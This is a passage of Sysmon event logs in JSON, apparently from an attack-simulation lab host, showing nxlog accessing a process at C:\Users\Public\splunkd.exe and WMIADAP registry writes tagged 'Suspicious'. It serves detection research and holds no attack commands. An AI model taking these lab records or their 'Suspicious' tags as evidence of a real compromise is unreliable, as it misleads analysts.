(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:16.493","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4423,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:17.493\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:17.493","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4424,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Data\r\nDetails: Binary Data","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Data","Details":"Binary Data","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4425,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteKey\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4426,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\kernelbase.dll[MofResourceName]\r\nDetails: LowDateTime:1098060289,HighDateTime:30805949***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\kernelbase.dll[MofResourceName]","Details":"LowDateTime:1098060289,HighDateTime:30805949***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4427,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\en-US\\kernelbase.dll.mui[MofResourceName]\r\nDetails: LowDateTime:625866771,HighDateTime:30682635***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\en-US\\kernelbase.dll.mui[MofResourceName]","Details":"LowDateTime:625866771,HighDateTime:30682635***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4428,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\ACPI.sys[ACPIMOFResource]\r\nDetails: LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\ACPI.sys[ACPIMOFResource]","Details":"LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4429,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]\r\nDetails: LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]","Details":"LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4430,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\mssmbios.sys[MofResource]\r\nDetails: LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\mssmbios.sys[MofResource]","Details":"LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4431,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\mssmbios.sys.mui[MofResource]\r\nDetails: LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\mssmbios.sys.mui[MofResource]","Details":"LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4432,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\intelppm.sys[PROCESSORWMI]\r\nDetails: LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\intelppm.sys[PROCESSORWMI]","Details":"LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4433,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\intelppm.sys.mui[PROCESSORWMI]\r\nDetails: LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\intelppm.sys.mui[PROCESSORWMI]","Details":"LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4434,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\xeniface.sys[XENIFACEMOF]\r\nDetails: LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\xeniface.sys[XENIFACEMOF]","Details":"LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4435,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refresh\r\nDetails: DWORD (0x00000000)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refresh","Details":"DWORD (0x00000000)","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4436,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:53:18.416\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-001016170600}\r\nProcessId: 3836\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refreshed\r\nDetails: DWORD (0x00000001)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 06:53:18.416","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-001016170600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refreshed","Details":"DWORD (0x00000001)","EventReceivedTime":"2020-08-01 06:53:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
